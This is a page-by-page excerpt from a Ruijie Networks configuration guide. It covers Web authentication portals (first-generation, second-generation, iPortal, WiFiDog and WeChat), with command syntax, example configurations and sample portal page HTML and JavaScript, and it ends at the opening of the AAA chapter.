  • Page 617 Enables Ruijie First-Generation web-auth enable Authentication on an interface. (Mandatory) It is used to set the basic parameters of Ruijie Second-Generation Web Authentication. aaa new-model Enables AAA. radius-server host {ip-address}[ auth-port Configures the RADIUS-server host and port-number ] [ acct-port port-number ] key communication key.
  • Page 618 Configuration Guide Configuring Web Authentication Configuration Description and Command Configures an AAA method list for Ruijie aaa accounting network { default | iPortal Accounting. (RADIUS list-name } start-stop method1 [ method2...] accounting is implemented.) web-auth template iportal Configures the iPortal Web-auth template.
  • Page 619 Mode bindmode {ip-mac-mode | ip-only-mode} Specifies the template binding mode. (Optional) It is used to configure the page suite used by Ruijie iPortal Web Authentication for a template. Customizing a Page Suite Customizes a page suite for Ruijie iPortal page-suite file-name Web Authentication.
  • Page 620 Configuration Guide Configuring Web Authentication Configuration Description and Command popup popup-mode [login-popup Configures the way an advertisement pops up. online-popup] (Optional) It is used to specify the iPortal Webauth advertisement mode in template Specifying the Advertisement configuration mode. Mode popup-mode [login-popup Specifies iPortal...
  • Page 621 Disables link detection. (Optional) It is used to disable portal extension in order to interwork with CMCC standard portal server. Portal extension must be enabled for interworking with Ruijie Disabling Portal Extension portal server software. no web-auth portal extension Disables portal extension.
  • Page 622 HTTP Retransmission Times iportal retransmit count retransmission times. (Optional) It is used to configure the service type used by Ruijie iPortal Web Authentication. Configuring Service Selection in Ruijie iPortal Web Authentication Configures the service type used by Ruijie iportal service [ internet internet-name] [ local local-name ] iPortal Web Authentication.
  • Page 623 (Optional) It is used to configure uniqueness check of portal authentication accounts. Configuring Uniqueness Check Configures uniqueness check of portal of Portal Authentication Accounts web-auth portal-valid unique-name authentication accounts. 1.4.1 Configuring Ruijie First-Generation Web Authentication Configuration Effect Redirect unauthenticated clients to the Webauth URL to perform authentication. Notes Configuration Steps ...
  • Page 624 Enabling Ruijie First-Generation Web Authentication on an Interface  Mandatory.  When Ruijie First-Generation Web Authentication is enabled in interface configuration mode, Web authentication is not enabled on any port by default. The users connecting to the port do not need to perform Web authentication. Verification ...
  • Page 625 Mode Usage Guide The URL starts with http:// or https://.  Configuring the Format of the Webauth URL Command fmt { ace | ruijie } Parameter Indicates the format of the Webauth URL. Description Command Webauth template configuration mode Mode Usage Guide ACE association is supported when fmt is set to ace.
  • Page 626 Configuration Guide Configuring Web Authentication Global configuration mode Command Mode Usage Guide  Configuring the SNMP-Server Community String Command snmp-server community {community-string}rw community-string: Indicates the community string. Parameter Description rw: Must be set to rw to support the read and write operations as the Set operation on MIB is required. Command Global configuration mode Mode...

  • Page 627: Scenario

    Configuring Ruijie First-Generation Web Authentication Scenario Figure 1-8  Configuration On the NAS, configure the IP address of the ePortal server and the key (ruijie) used for communicating Steps with the ePortal server.  Configure the Webauth URL on the NAS.
  • Page 628 Configuration Guide Configuring Web Authentication Ruijie(config)# snmp-server community public rw Ruijie(config)# snmp-server enable traps web-auth Ruijie(config)# snmp-server host 192.168.197.79 inform version 2c public web-auth Ruijie(config)# exit Ruijie(config)# interface range GigabitEthernet 0/2-3 Ruijie(config-if-range)# web-auth enable Ruijie(config-if-range)# exit  Verification Check whether Web authentication is configured successfully.
  • Page 629  Ruijie Second-Generation Web Authentication complies with the CMCC WLAN Service Portal Specification. Furthermore, it is extended to support Ruijie portal server. Perform compatible configuration based on the server performance in actual deployment. For details, see the subsequent chapter. ...
  • Page 630 Configuring Web Authentication  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must enable AAA.  The NAS is responsible for initiating authentication to the portal server through AAA in Ruijie Second-Generation Web Authentication.  Configuring the RADIUS-Server Host and Communication Key ...
  • Page 631 Enabling Ruijie Second-Generation Web Authentication on an Interface  Mandatory.  When Ruijie Second-Generation Web Authentication is enabled in interface configuration mode, Web authentication is not enabled on any port by default. The users connecting to the port do not need to perform Web authentication. Verification ...
  • Page 632 The URL starts with http:// or https://.  Configuring the Format of the Webauth URL Command fmt {cmcc-ext1 | cmcc-ext2 | cmcc-mtx | cmcc-normal | ct-jc | cucc| ruijie | custom} Parameter Indicates the format of the Webauth URL. Description...
  • Page 633 Description portal server. The key contains up to 255 characters. Command Global configuration mode Mode Usage Guide  Enabling Ruijie Second-Generation Web Authentication on an Interface Command web-auth enable {eportalv2 | template-name} Parameter Indicates a Webauth template. Description Command Interface configuration mode...

  • Page 634: Scenario

    Configure the default AAA method lists for Web authentication and accounting on the NAS.  Configure the IP address of the portal server and the Webauth communication key (ruijie) used for communicating with the portal server on the NAS. ...
  • Page 635 Check whether Web authentication is configured successfully. Ruijie(config)#show running-config … aaa new-model aaa authentication web-auth default group radius aaa accounting network default start-stop group radius … radius-server host 192.168.197.79 key ruijie … web-auth template eportalv2 ip 192.168.197.79 url http://192.168.197.79:8080/eportal/index.jsp web-auth portal key ruijie …...
  • Page 636  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must enable AAA.  The iPortal NAS is responsible for initiating authentication to the portal server through AAA in Ruijie iPortal Web authentication.  Configuring the RADIUS-Server Host and Communication Key ...
  • Page 637  Configuring an AAA Method List for Ruijie iPortal Web Authentication  (Mandatory) To enable Ruijie iPortal Web Authentication, you must configure an AAA method list for Ruijie iPortal Web Authentication.  An AAA authentication method list associates Web authentication requests with the RADIUS server. The NAS selects an authentication method and server based on the method list.
  • Page 638 By default, the authentication port number is 1812, and the accounting port number is 1813. Usage Guide  Configuring an AAA Method List for Ruijie iPortal Web Authentication Command aaa authentication iportal { default | list-name } method1 [ method2...] list-name: Creates a method list.
  • Page 639 Indicates the advertisement interval. Description Webauth template configuration mode Command Mode Usage Guide  Enabling Ruijie iPortal Web Authentication on an Interface Command web-auth enable iportal Parameter Indicates the customized template name. Description Command Interface configuration mode or global configuration mode...
  • Page 640 Ruijie(config)# interface range GigabitEthernet 0/2-3 Ruijie(config-if-range)# web-auth enable iportal Ruijie(config-if-range)# exit  Verification Check whether Ruijie iPortal Web Authentication is configured successfully. Ruijie(config)#show running-config … aaa new-model aaa authentication web-auth default group radius aaa accounting network default start-stop group radius …...
  • Page 641 Configuration Guide Configuring Web Authentication Ruijie#show web-auth control Port Control Server Name Online User Count ------------------------- -------- --------------------- ----------------- … GigabitEthernet 0/2 iportal GigabitEthernet 0/3 iportal … Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: iportal Page-suit: default BindMode: ip-mac-mode...
  • Page 642 Enabling Ruijie iPortal Web Authentication on an Interface  Mandatory.  When Ruijie iPortal Web Authentication is enabled in interface configuration mode, Web authentication is not enabled on any port by default. The users connecting to the port do not need to perform Web authentication. Verification ...

  • Page 643: Scenario

    Configuration Guide Configuring Web Authentication Command url { url-string } Parameter Indicates the Webauth URL of the portal server. Description Command Webauth template configuration mode Mode Usage Guide The URL starts with http://.  Configuring the IP Address of the NAS Command nas-ip { ip-address } Parameter...
  • Page 644 Configuration Guide Configuring Web Authentication Ruijie# config Enter configuration commands, one per line. End with CNTL/Z. Ruijie(config)#web-auth template wifidog Ruijie(config.tmplt.wifidog)#ip 192.168.197.79 Ruijie(config.tmplt.wifidog)#url http://192.168.197.79/auth/wifidogAuth Ruijie(config.tmplt.wifidog)#nas-ip 192.168.197.95 Ruijie(config.tmplt.wifidog)#exit Ruijie(config)# wlansec 10 Ruijie(config-wlansec)#web-auth portal wifidog Ruijie(config-if-range)# webauth Ruijie(config-if-range)# exit  Verification Check whether WiFiDog Web authentication is configured successfully.
  • Page 645 Configuration Steps  Enabling AAA  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must enable AAA.  The NAS is responsible for initiating authentication to the portal server through AAA in Ruijie Second-Generation Web Authentication. Command aaa new-model Parameter Description...
  • Page 646 Indicates method 2. Command Global configuration mode Mode Usage Guide Ruijie Second-Generation Web Authentication adopts the RADIUS accounting method.  Configuring the Second-Generation Webauth Template  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must configure and apply the portal server.
  • Page 647  Configuring the Webauth Communication Key  (Mandatory) To enable Ruijie Second-Generation Web Authentication, you must configure the key used for the communication between the NAS or convergence device and portal server.  When the NAS finds an unauthenticated client attempting to access network resources, it redirects the client to the...
  • Page 648 Configuration Guide Configuring Web Authentication process, the communication key is used to encrypt some data exchanged between the NAS and portal server to improve security. Command web-auth portal key { key-string } Parameter key-string: Indicates the Webauth communication key used for the communication between the NAS and Description portal server.

  • Page 649: Scenario

    Configure the default AAA method lists for Web authentication and accounting on the NAS.  Configure the IP address of the portal server and the Webauth communication key (ruijie) used for communicating with the portal server on the NAS. ...
  • Page 650 Configuration Guide Configuring Web Authentication Ruijie(config)#aaa authentication web-auth default group radius Ruijie(config)#aaa accounting network default start-stop group radius Ruijie(config)#web-auth template eportalv2 Ruijie(config.tmplt.eportalv2)#ip 192.168.197.79 Ruijie(config.tmplt.eportalv2)#exit Ruijie(config)#web-auth portal key ruijie Ruijie(config)# web-auth template eportalv2 Ruijie(config.tmplt.eportalv2)#url http://192.168.197.79:8080/eportal/index.jsp Ruijie(config.tmplt.eportalv2)#fmt cmcc-ext1 Ruijie(config.tmplt.eportalv2)#exit Ruijie(config)# web-auth sms-flow interval 5 threshold 10...
  • Page 651 Configuration Guide Configuring Web Authentication … wlansec 1 web-auth bind-portal eportalv2 interface GigabitEthernet 0/3 web-auth enable eportalv2 Common Errors  The communication key between the portal server and NAS is configured incorrectly or only on the portal server or NAS, causing authentication errors.
  • Page 652 Configuring the WeChat Webauth Version  (Optional) By default, V1.0 is used. Command version{1.0 | 16wifi} Parameter version: Indicates the version of WeChat Web authentication. By default, Ruijie V1.0 is used. Description Webauth template configuration mode Command Mode Usage Guide...
  • Page 653 Configuration Guide Configuring Web Authentication port 4990.  Configuring PC Authentication Exemption  (Optional)Authentication exemption allows the STAs that are identified as PC or Other to access the Internet without performing WeChat-based Wi-Fi connection authentication. Command free-auth pc Parameter Description Command Webauth template configuration mode Mode...
  • Page 654 Configuration Guide Configuring Web Authentication  To cancel collective escape, run the web-auth wechat-escape recover command in global configuration mode to restore the single escape state. Command web-auth wechat-escape interval minutes times count Parameter minutes: Indicates timer interval for judging collective escape. The unit is minutes and the default value is 60 Description minutes.

  • Page 655: Scenario

     Configure the IP address and Webauth URL on the NAS.  Configure the communication key (ruijie) used for communicating with the portal server on the NAS.  Configure the IP address used for external communication on the NAS. ...
  • Page 656 Configuration Guide Configuring Web Authentication Ruijie(config.tmplt.wechat)#nas-ip 192.168.197.104 Ruijie(config.tmplt.wechat)#version 1.0 Ruijie(config.tmplt.wechat)#exit Ruijie(config)# wlansec 1 Ruijie(config-wlansec)# web-auth portal wechat Ruijie(config-wlansec)# webauth Verification Check whether Web authentication is configured successfully. Ruijie(config)#show running-config … ip name-server 192.168.58.110 … web-auth template wechat ip 192.168.197.79 service-url wmc.ruijie.com.cn key ruijie nas-ip 192.168.197.104...
  • Page 657 Configuration Guide Configuring Web Authentication  The ip dhcp snooping, ip dhcp snooping trust, and web-auth sta-perception enable commands are not executed when smart authentication is enabled, causing a failure of the smart authentication during second-time authentication. 1.4.7 Specifying an Authentication Method List Configuration Effect ...
  • Page 658  Specifying an Authentication Method List  Configuration Specify the authentication method list mlist1. Steps Ruijie(config.tmplt.iportal)#authentication mlist1  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: eportalv2 Url: http://17.17.1.21:8080/eportal/index.jsp 17.17.1.21 BindMode: ip-only-mode Type:...
  • Page 659 Ensure that the configured accounting method list name is consistent with that on the AAA module. Configuration Example  Specifying an Accounting Method List  Configuration Specify the accounting method list mlist1. Steps Ruijie(config.tmplt.eportalv2)#accounting mlist1  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: eportalv2 Url: http://17.17.1.21:8080/eportal/index.jsp 17.17.1.21...
  • Page 660 When the listening port of the portal server is changed, the communication port of the portal server must be modified on the NAS to enable the NAS to interact with the portal server.  In Ruijie iPortal Web Authentication, this function is used to configure the HTTP listening port of the NAS. The default port number is 8081. Notes ...

  • Page 661: Scenario

    Configuring the Communication Port of the Portal Server  Configure the communication port of the portal server as port 10000. Configuration Steps Ruijie(config.tmplt.eportalv2)#port 10000  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: eportalv2 Url: http://17.17.1.21:8080/eportal/index.jsp 17.17.1.21 BindMode: ip-only-mode...

  • Page 662: Scenario

    {ip-mac-mode | ip-only-mode} Parameter ip-mac-mode: Indicates IP-MAC binding mode. Description ip-only-mode: Indicates IP-only binding mode. Webauth template configuration mode Command Mode Usage Guide Configuration Example  Specifying the Webauth Binding Mode  Set the binding mode to IP-only. Configuration Steps Ruijie(config.tmplt.eportalv2)#bindmode ip-only-mode...
  • Page 663 For details, see section 1.4.37 "Customizing a Page Suite." Configuration Steps  (Optional) By default, the default page suite is used. Verification  Configure Ruijie iPortal Web Authentication.  Download a page suite.  Specify the page suite.  Check whether the page suite is applied to the login page.
  • Page 664 Authmlist:default 1.4.12 Configuring an Advertisement URL Configuration Effect  Push advertisements or notices to users during Ruijie iPortal Web Authentication. Notes  To support the push feature, browsers must support the tab page mechanism. Mainstream browsers support this mechanism, whereas some browsers with built-in applications may not support it.
  • Page 665 (Optional) By default, no advertisement URL is configured, indicating that advertisements are not pushed. If an advertisement URL is configured, advertisements are displayed to users after authentication by default. Verification  Configure Ruijie iPortal Web Authentication.  Configure the advertisement URL. ...
  • Page 666 Configuration Steps  Optional.  The default is post-login mode. Verification  Configure Ruijie iPortal Web Authentication.  Configure the advertisement URL.  Check whether the browser displays the specified advertisement URL after authentication. Related Commands  Specifying the Advertisement Mode...
  • Page 667 Select an advertisement mode based on actual requirements. By default, the post-login mode is used. Configuration Example  Specifying the Advertisement Mode  Configuration Configure the advertisement mode as pre-login. Steps Ruijie(config.tmplt.iportal)#popuphttp://www.ruijie.com.cn/ Ruijie(config.tmplt.iportal)#popup mode login-popup  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: iportal...
  • Page 668 Configuration Guide Configuring Web Authentication Verification  Configure a customized URL.  Open the browser of a PC and access the Internet through the port without performing authentication.  Check whether the access requests are redirected and the parameters of the redirection URL are consistent with those of the customized URL.
  • Page 669 Configure the plaintext IP address and MAC address of an STA,IP address of the NAS, SSID, URL, Configuration Steps and other parameters as the redirection URL parameters. Ruijie(config.tmplt.eportalv2)# fmt custom encry none user-ip userip user-mac usermac mac-format none nas-ip nasip ssid ssid url firstu  Check whether the configuration is successful.
  • Page 670 Configuration Example  Configuring the Redirection HTTP Port  Configure port 8080 as the redirection HTTP port. Configuration Steps Ruijie(config)#http redirect port 8080  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth rdport Rd-Port: 80 443 8080 1.4.16 Configuring Rate Limit Webauth Logging Configuration Effect ...
  • Page 671 Configuration Example  Configuring Rate Limit Webauth Logging  Configuration Disable rate limit Webauth Logging. Steps Ruijie(config)#web-auth logging enable 0  Check whether the configuration is successful. Verification Ruijie(config)#show running-config … web-auth logging enable 0 …...

  • Page 672: Scenario

    Configuration Guide Configuring Web Authentication  A user occupies an HTTP session when performing authentication, and the other application programs of the user may also occupy HTTP sessions. For this reason, it is recommended that the maximum number of HTTP sessions for an unauthenticated user be not set to 1.
  • Page 673 Configuration Guide Configuring Web Authentication Ruijie(config)#http redirect session-limit 3  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth parameter HTTP redirection setting: session-limit: 3 timeout: Ruijie(config)# 1.4.18 Configuring the HTTP Redirection Timeout Configuration Effect  Configure the HTTP redirection timeout to maintain redirection connections. When an unauthenticated user tries to access network resources through HTTP, the TCP connection requests sent by the user will be intercepted and re-established with the NAS or convergence device.
  • Page 674 Usage Guide Configuration Example  Configuring the HTTP Redirection Timeout  Configuration Set the HTTP redirection timeout to 5s. Steps Ruijie(config)#http redirect timeout 5  Check whether the configuration is successful. Verification Ruijie(config)#show web-auth parameter HTTP redirection setting: session-limit: 255 timeout: 1.4.19 Configuring the Straight-Through Network Resources...
  • Page 675 To set authentication-exempted ARP resource, use the http redirect direct-arp command preferentially. Configuration Example  Configuring the Straight-Through Network Resources  Configuration Configure the straight-through network resources as 192.168.0.0/16. Steps Ruijie(config)#http redirect direct-site 192.168.0.0 255.255.0.0  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth direct-site Direct sites: Address Mask...
  • Page 676 Configuration Guide Configuring Web Authentication When ARP check or similar functions are enabled, the ARP learning performed by clients is controlled. As a result, clients cannot learn the ARPs of the gateway and other devices, which affects user experience. You can configure the straight-through ARP resource range to permit the ARP learning packets destined for the specified address to pass.
  • Page 677 Configuration Guide Configuring Web Authentication  Configure the straight-through ARP resource as 192.168.0.0/16. Configuration Steps Ruijie(config)#http redirect direct-arp 192.168.0.0 255.255.0.0  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth direct-arp Direct arps: Address Mask --------------- --------------- 192.168.0.0 255.255.0.0 Ruijie(config)# 1.4.21 Configuring an Authentication-Exempted Address Range...
  • Page 678 After the port field is set, authentication exemption takes effect only on the configured interface. Configuration Example  Configuring an Authentication-Exempted Address Range  Configuration Configure an authentication-exempted address range. Steps Ruijie (config)# web-auth direct-host 192.168.197.64  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth direct-host Direct hosts: Address Mask...
  • Page 679 NAS determines that the portal server is available. Because some servers or intermediate network segments filter ping packets, the first method is commonly used. The ping detection method is only used based on special requirements. In Ruijie First-Generation Web Authentication, the NAS connects to a port of the portal server...

  • Page 680: Scenario

    Only one of the two detection methods can be used at a time in case of collision. If both detection methods are configured, a detection algorithm conflict will occur or the detection results will be inaccurate.  The system will automatically select a detection method based on whether Ruijie First- or Second-Generation Web Authentication is used. Configuration Steps ...
  • Page 681 Configuration Example  Configuring Portal Detection  Configure portal detection. Configuration Steps Ruijie(config)#web-auth portal-check interval 20 timeout 2 retransmit 2  Check whether the configuration is successful. Verification Ruijie(config)#show running-config … web-auth portal-check interval 20 timeout 2 retransmit 2 …...
  • Page 682 If the nokick attribute is deleted, the system forces users offline. Configuration Example  Configuring Portal Escape  Configuration Configure portal escape. Steps Ruijie(config)#web-auth portal-escape  Verification Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth portal-escape …...
  • Page 683  DHCP address check is supported only for IPv4.  DHCP address check is applicable only to Ruijie Second-Generation Web Authentication and iPortal Web Authentication.  The requirement that users obtain IP addresses through DHCP must be specified during network deployment. Those users cannot also use static IP addresses;...
  • Page 684 Configuration Guide Configuring Web Authentication  Enabling DHCP Address Check  Configuration Enable DHCP address check. Steps Ruijie(config)#web-auth dhcp-check  Verification Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth dhcp-check … 1.4.26 Disabling Link Detection Configuration Effect ...
  • Page 685 1.4.27 Disabling Portal Extension Configuration Effect  Enable portal extension to support Ruijie portal server and portal servers that comply with the CMCC WLAN Service Portal Specification.  You can select multiple redirection URL formats when interworking with the servers comply with the CMCC WLAN Service Portal Specification to achieve compatibility with different servers.
  • Page 686  If the portal server is a product of Ruijie, use the default mode, that is, extension mode. If the portal server complies with the CMCC WLAN Service Portal Specification, disable portal extension.
  • Page 687 Configuration Guide Configuring Web Authentication  Check whether the configuration is successful. Verification Ruijie(config)#show running-config … no web-auth web-auth portal extension http redirect url-fmt ext1 … 1.4.28 Configuring a Whitelist and Blacklist Configuration Effect  Configure a whitelist to allow unauthenticated clients to access some network resources, and configure a blacklist to prevent authenticated clients from accessing some network resources.
  • Page 688 Configuration Example  Configuring a Whitelist and Blacklist  Configure a whitelist and blacklist. Configuration Steps Ruijie(config)#web-auth acl black-ip 192.168.1.2 Ruijie(config)#web-auth acl white-url www.ruijie.com.cn  Verification Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth acl black-ip 192.168.1.2 web-auth acl white-url www.ruijie.com.cn...

  • Page 689: Scenario

    By default, they are not included. Configuration Example  Configuring Jitter-off Accounting  Configure jitter-off accounting. Configuration Steps Ruijie(config)#web-auth accounting jitter-off  Verification Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth accounting jitter-off …...
  • Page 690  Configuring the Portal Communication Port  Configuration Configure an aggregate port as the portal communication port. Steps Ruijie(config)#ip portal source-interface Aggregateport 1 Verification  Check whether the configuration is successful. Ruijie(config)#show running-config ip portal source-interface Aggregateport 1 1.4.31 Configuring a NDKEY-Compatible Webauth URL Configuration Effect ...
  • Page 691 Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth dkey-compatible url-parameter login 1.4.32 Enabling NAT for Ruijie iPortal Web Authentication Configuration Effect  Configure Ruijie iPortal Web Authentication to support NAT. Notes  NAT takes effect only in Ruijie iPortal Web Authentication. Configuration Steps...
  • Page 692 Command Global configuration mode Mode Usage Guide Verification  Check whether Ruijie iPortal Web Authentication can be implemented after NAT is enabled. Configuration Example  Enabling NAT for Ruijie iPortal Web Authentication Configuration  Enable NAT for Ruijie iPortal Web Authentication.
  • Page 693 … iportal retransmit 5 1.4.34 Configuring Service Selection in Ruijie iPortal Web Authentication Configuration Effect  Configure the service type used by Ruijie iPortal Web Authentication. Notes  Configuration Steps  Configuring the Service Type Used by Ruijie iPortal Web Authentication ...
  • Page 694 Configuration Example  Configuring a Service Type Configuration  Configure a service type. Steps Ruijie(config)#iportal service local local-srv Verification  Check whether the configuration is successful. Ruijie(config)#show running-config … iportalservice local local-srv 1.4.35 Configuring the Accounting Method List of Web Authentication Configuration Effect ...
  • Page 695 Configuration Example  Configuring an Accounting Method Configuration  Configure an accounting method. Steps Ruijie(config.tmplt.eportalv2)#web-auth accounting v2 default Verification  Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth accounting v2 default 1.4.36 Configuring a Web Authentication Method List Configuration Effect ...

  • Page 696: Scenario

     Some NASs do not have a default page suite. When Ruijie iPortal Web Authentication is implemented, prepare a page suite in accordance with the relevant specification and import the page suite to the flash memory.
  • Page 697 Configuration Guide Configuring Web Authentication login.htm Login page online.htm Online page (which is displayed when users pass authentication) offline.htm Offline page login_mobile.htm Login page for mobile STAs online_mobile.htm Online page for mobile STAs (which is displayed when users pass authentication) offline_mobile.htm Offline page for mobile STAs ...
  • Page 698 Configuration Guide Configuring Web Authentication _errormsg.appendChild(script); //Call the init function when the login page is loaded. function init() { …… requestErrorMsg(); …… </script>  Form submission A form is submitted in the format of username=[AAAA]&password=[BBBB]&lang=[CCCC]. The meanings of the fields are described in the following: [AAAA]: (optional)Indicates the user name that the user enters in the User name text box.
  • Page 699 Configuration Guide Configuring Web Authentication script.src=”errormessage”+location.search; _errormsg.appendChild(script); function init() { …… requestErrorMsg(); //Script that is executed when a user clicks the Login button function login() { document.getElementById('loginForm').action = "./login.htm"+location.search; document.getElementById('loginForm').submit(); window.onbeforeunload = null; window.onunload = null; …… </script> <body onload="init()"> <form method="post"...
  • Page 700 Configuration Guide Configuring Web Authentication </body> </html> The following figure shows the login page that the iPortal server pushes to users: The login page shows only the mandatory elements. Other functions can be added. For example, you can add a background and set the styles of page elements.
  • Page 701 Configuration Guide Configuring Web Authentication (Optional) Tab with the userip ID: displays the IP address of the online user. (Optional) Tab with the usermac ID: displays the MAC address of the online user. (Optional) Tab with the ssid ID: displays the SSID of the online user. (Optional) Tab with the availtime ID: displays the available time during which the user can access the Internet.
  • Page 702 Configuration Guide Configuring Web Authentication <script language="javascript"> //Obtain the information of the online user, including the user name, IP address, MAC address, and associated SSID of the online user, and available time. function requestOnlineInfo() { var _availTime=document.getElementById("availtime"); var script=document.createElement(“script”); script.src="getonlineinfo"+location.search; _availTime.appendChild(script);...
  • Page 703 Configuration Guide Configuring Web Authentication <tr><td>MAC address:</td><td id="usermac"></td></tr> <tr><td>Associated SSID:</td><td id="ssid"></td></tr> <tr><td>Available time:</td><td id="availtime"></td></tr> </table> </body> </html> The following figure shows the login page that the iPortal server pushes to users: The login page shows only the mandatory elements. Other functions can be added. For example, you can add a background and set the styles of page elements.
  • Page 704 Configuration Guide Configuring Web Authentication var script=document.createElement("script"); script.src="getofflineinfo"+location.search; _timeused.appendChild(script); function init() { requestUserInfo(); </script> <body onload="init()"> …… </body> The HTML source code of the offline page is as follows: <html> <head> <title>Web authentication offline page</title> </head> <script language="javascript"> //Obtain the used time information. function requestOfflineInfo() { var _timeused=document.getElementById("timeused");...
  • Page 705 Configuration Guide Configuring Web Authentication </script> <body onload="init()"> Logout succeeded<br> <table> <tr><td>Used time:</td><td id="timeused"></td></tr> </table> </body> </html> The following figure shows the offline page that the iPortal server pushes to users: The offline page shows only the mandatory elements. Other functions can be added. For example, you can add a background and set the styles of page elements.
  • Page 706  Customizing a Page Suite  Configuration Customize a page suite. Steps Ruijie(config.tmplt.iportal)#page-suit ruijiepage  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: iportal Page-suit: ruijiepage Advertising url: default Advertising mode: online-popup Type:...
  • Page 707 Related Commands  Configuring the Resource Address of the Portal Server in Ruijie First-Generation Web Authentication Command http redirect homepge url url: Indicates the resource address of the ePortal server in Ruijie First-Generation Web Authentication. Parameter Description Command Global configuration mode...
  • Page 708 Mode Usage Guide In the 11.X version, the command is converted into web-auth enable <type>, in which type specifies the type (first or second generation) of Web authentication. The default type is Ruijie First-Generation Web Authentication.  Configuring the IP-Only Binding Mode...
  • Page 709 Configuring Ruijie First-Generation Web Authentication  Check that the NAS runs on the 10.X version and is configured with the IP address of the portal server Configuration used by Ruijie First-Generation Web Authentication. Steps Ruijie(config)# http redirect 192.168.197.64  Upgrade the NAS to 11.X.

  • Page 710: Scenario

     Configuring Noise Reduction in Wireless Web Authentication Configuration  Set the parameters of noise reduction in wireless Web authentication. Steps Ruijie(config)#web-auth noise aging 1 hit 3 Verification  Check whether the configuration is successful. Ruijie(config)#show running-config 1.4.40 Enabling Automatic...
  • Page 711 Configuration Example  Enabling iOS Automatic Pop-up Window Control in WeChat-Based Authentication  Enable iOS automatic pop-up window control. Configuration Steps Ruijie(config)#http redirect adapter ios Verification  Check whether the configuration is successful. Ruijie(config)#show running-config … http redirect adapter ios 1.4.41 Enabling the Smart WeChat Web Authentication...

  • Page 712: Scenario

    Enabling the Smart WeChat Web Authentication Configuration  Enable the smart WeChat Web authentication. Steps  The configuration is optional. Ruijie(config)#web-auth sta-perception enable Verification  Check whether the configuration is successful. Ruijie(config)#show running-config 1.4.42 Configuring User Detection Under WLANSEC Configuration Effect ...
  • Page 713 Configuration Example  Configuring User Detection Under WLANSEC Configuration  Set user detection under WLANSEC 1. Steps Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#web-auth offline-detect interval 30 flow 10000...

  • Page 714: Scenario

    Configuration Guide Configuring Web Authentication Verification  Check whether the configuration is successful. Ruijie(config)#show running-config | be wlansec 1 wlansec 1 web-auth offline-detect interval 30 flow 10000 … 1.4.43 Configuring Transparent Transmission of the 0x05 Attribute of the Portal Protocol Configuration Effect ...
  • Page 715  Configuring Transparent Transmission of the 0x05 Attribute of the Portal Protocol Configuration  Configure transparent transmission of the 0x05 attribute. Steps Ruijie(config)# web-auth portal-attribute 5 Ruijie(config)# web-auth portal-attribute textinfo Verification  Check whether the configuration is successful. Ruijie(config)#show running-config 1.4.44 Configuring Uniqueness Check of Portal Authentication Accounts...
  • Page 716 ErrCode 2-contained ACK_AUTH. Related Commands  Configuring Uniqueness Check of Portal Authentication Accounts Configuration  Configure uniqueness check of portal authentication accounts. Steps Ruijie(config)# web-auth portal-valid unique-name Verification  Check whether the configuration is successful. Ruijie(config)#show running-config 1.5 Monitoring Clearing Description Command Forces users offline.
  • Page 717 Configuration Guide Configuring Web Authentication Description Command Clears clear web-auth direct-host authentication-exempted users. Clears the Webauth blacklist and clear web-auth acl whitelist configuration. Displaying Description Command Displays the Webauth blacklist and show web-auth acl whitelist configuration. Displays the basic parameters of show web-auth parameter Web authentication.
  • Page 718 Configuration Guide Configuring Web Authentication Description Command Displays iPortal Webauth show web-auth local-portal information. Displays the Webauth portal check show web-auth portal-check information. Displays noise reduction show web-auth noise configuration of Web authentication. Debugging System resources are occupied when debugging information is output. Disable the debugging switch immediately after use.
  • Page 719 AAA is the most fundamental method of access control. Ruijie Networks also provides other simple access control functions, such as local username authentication and online password authentication. Compared to them, AAA offers higher level of network security.

  • Page 720: Scenario

    Configuration Guide Configuring AAA 2.2.1 Configuring AAA in a Single-Domain Environment Scenario In the network scenario shown in Figure 2-1, the following application requirements must be satisfied to improve the security management on the NAS: To facilitate account management and avoid information disclosure, each administrator has an individual account with different username and password.

  • Page 721: Scenario

    Scenario Configure the domain-based AAA service on the NAS.  A user can log in by entering the username PC1@ruijie.net or PC2@ruijie.com.cn and correct password on an 802.1X client.  Permission management: Users managed are classified into Super User and Common User. Super users have the rights to view and configure the NAS, and common users are only able to view NAS configuration.
  • Page 722 AAA service when the first method fails. On Ruijie devices, the first method in the list is tried in the beginning and then the next is tried one by one if the previous gives no response.
  • Page 723 Configuration Guide Configuring AAA request is denied. The Timeout response indicates that the security server fails to respond to the identity query. When detecting a timeout event, the AAA service proceeds to the next method in the list to continue the authentication process.
  • Page 724  AAA Authentication Types Ruijie products support the following authentication types:  Login authentication Users log in to the command line interface (CLI) of the NAS for authentication through Secure Shell (SSH), Telnet, and File Transfer Protocol (FTP).
  • Page 725 Configuration Guide Configuring AAA Before you configure an AAA authentication scheme, determine whether to use local authentication or remote server authentication. If the latter is to be implemented, configure a RADIUS or TACACS+ server in advance. If local authentication is selected, configure the local user database information on the NAS. ...
  • Page 726 Configuration Guide Configuring AAA After users access the Internet, the users are authorized to use the specific session services. For example, after users access the Internet through PPP and Serial Line Internet Protocol (SLIP), the users are authorized to use the data service, bandwidth, and timeout service.
